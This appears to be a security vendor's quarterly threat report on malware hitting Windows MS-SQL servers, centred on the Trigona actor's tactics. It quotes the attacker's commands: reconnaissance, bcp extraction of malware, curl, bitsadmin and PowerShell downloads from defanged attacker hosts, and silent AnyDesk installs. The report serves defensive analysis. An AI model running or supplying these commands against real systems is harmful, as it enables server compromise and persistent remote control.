Statistics Report on Malware Targeting Windows Database Servers in Q4 2025
AhnLab SEcurity intelligence Center (ASEC) utilizes the AhnLab Smart Defense (ASD) infrastructure to respond to and categorize attacks targeting MS-SQL and MySQL servers installed on Windows operating systems. This post covers the damage status of MS-SQL and MySQL servers that have become attack targets and statistics on attacks against these servers, based on the logs identified in the fourth quarter of 2025. It also categorizes the malware strains used in each attack and provides detailed statistics.
1. Status of Attacks Targeting Windows Database Servers
The following are statistics on attacks against MS-SQL servers in the 4th quarter of 2025, as confirmed through AhnLab Smart Defense (ASD) logs. While the number of attacks and targeted systems had been decreasing, the number of attacks suddenly increased in December 2025.
The types of malware mostly used in attacks are CLRShell, which is exploited to execute the threat actor’s commands, and Potato-like malware, which are responsible for privilege escalation. However, there are other types of malware as well. CoinMiners exploit the resources of infected systems to mine cryptocurrency, while Proxyware exploits a portion of the available internet bandwidth and shares it externally to generate profit. There are also cases where backdoors such as Gh0stRAT, CobaltStrike, and Meterpreter are installed to steal control over the infected systems. Recently, there have been cases where legitimate remote control applications such as AnyDesk and RustDesk have been installed in addition to these backdoors.
2. Attacks in the 4th Quarter of 2025
In the fourth quarter of 2025, the attack cases of the Trigona threat actor targeting MS-SQL servers were covered. The Trigona threat actor is still active and they continue to launch attacks in a similar manner to their past cases, but they are now using new types of malware and tools. The Trigona ransomware threat actor targets MS-SQL servers that are exposed to the Internet and have account credentials configured in a simple manner, making them vulnerable to brute-force and dictionary attacks. Upon successful login, the threat actor uses CLR Shell to install additional payloads, a tactic that has been consistent in recent cases. The following are the commands executed by the threat actor after gaining control over the MS-SQL server to obtain information about the infected system.
> hostname
> whoami
> systeminfo
> tasklist
> wmic useraccount where (LocalAccount=True) get name
> powershell -Command “net user ladmin
One of the key characteristics of the Trigona threat actor is that they create files using Bulk Copy Program (BCP). bcp.exe is a command-line tool used to import and export large amounts of external data in MS-SQL servers. Typically, it is used to store large amounts of data from a table in an SQL server into a local file, or to export data from a local file into a table in an SQL server.
The threat actor then used BCP to store the malware in the database and create a file locally. In other words, the threat actor exported the malware to a local path using the following commands from the table “uGnzBdZbsi” where the malware was stored, and “FODsOZKgAU.txt” is a format file that contains the format information. Additionally, “uGnzBdZbsi” and “FODsOZKgAU.txt” are both keywords that were used in the 2024 attack case.
> bcp “select binaryTable from uGnzBdZbsi” queryout “C:\ProgramData\spd.exe” -T -f “C:\ProgramData\FODsOZKgAU.txt
> bcp “select binaryTable from uGnzBdZbsi” queryout “C:\ProgramData\AD.exe” -T -f “C:\ProgramData\FODsOZKgAU.txt
> bcp “select binaryTable from uGnzBdZbsi” queryout “C:\users\[username]\music\L.bat” -T -f “C:\users\[username]\music\FODsOZKgAU.txt
> bcp “select binaryTable from uGnzBdZbsi” queryout “C:\users\[User Name]\music\pci2.exe” -T -f “C:\users\[User Name]\music\FODsOZKgAU.txt
Figure 1. Creating malware using BCP
Of course, BCP is not the only tool being exploited, and various tools such as Curl, Bitsadmin, and PowerShell have been used to download malware.
> curl hxxps://cia[.]tf/60b30e194972f937b859d0075be69e2a.exe -o C:\Windows\SERVIC~1\MSSQL$~1\AppData\Local\Temp\glock.exe
> bitsadmin /transfer indirme /download /priority normal hxxp://195.66.214[.]79/pci.exe c:\users\[User Name]\Videos\pci.exe
> powershell Invoke-WebRequest -Uri “hxxp://195.66.214[.]79/L.bat” -OutFile “c:\users\[User Name]\music\L.bat
The threat actor, as in previous cases, utilized AnyDesk to control the infected system. The following commands were used to install AnyDesk in the %ALLUSERSPROFILE% path.
> %SystemDrive%/programdata/AD.exe –install C:\programdata –silent
> %SystemDrive%/programdata/Anydesk-e7eba7df –get-id
In addition, RDP was used to add a user named “Remote99” or “Ladmin” that can access RDP by executing the following batch file. The batch malware also features a function to modify the AnyDesk or UseLogonCredential registry key.
Figure 2. Batch file responsible for adding a user
Among the newly identified malware, there is a downloader created with Bat2Exe. Its main function is to create and execute a batch file like the one below. This batch script also creates an account named “erp2,” but the additional function is that it installs an MSI file from an external source. As of now, the download is unavailable, but it is presumed to be the installation of an RMM tool called Teramind. It appears that the threat actor used Teramind in addition to RDP and AnyDesk to control the infected system.
Figure 3. Teramind downloader script
One of the key differences from previous cases is that multiple scanner malware are being used. The scanner is written in Rust and upon execution, it transmits information about the infected system, including the IP and location information obtained through “ip-api.com”, to the C&C server. It then performs scans based on commands given, targeting RDP and MS-SQL services.
Figure 4. Strings of the Rust scanner malware
Additionally, it seems that the threat actor performs tests before installing these scanning and brute-forcing malware. Among the tools installed by the threat actor, they have used SpeedTest, an internet speed measurement tool provided by Ookla, and StressTester, which is presumed to be developed by the threat actor. StressTester is developed in Go and provides testing functions for not only GET and POST requests, but also SQL injection requests.
Figure 5. StressTester with SQL injection functions
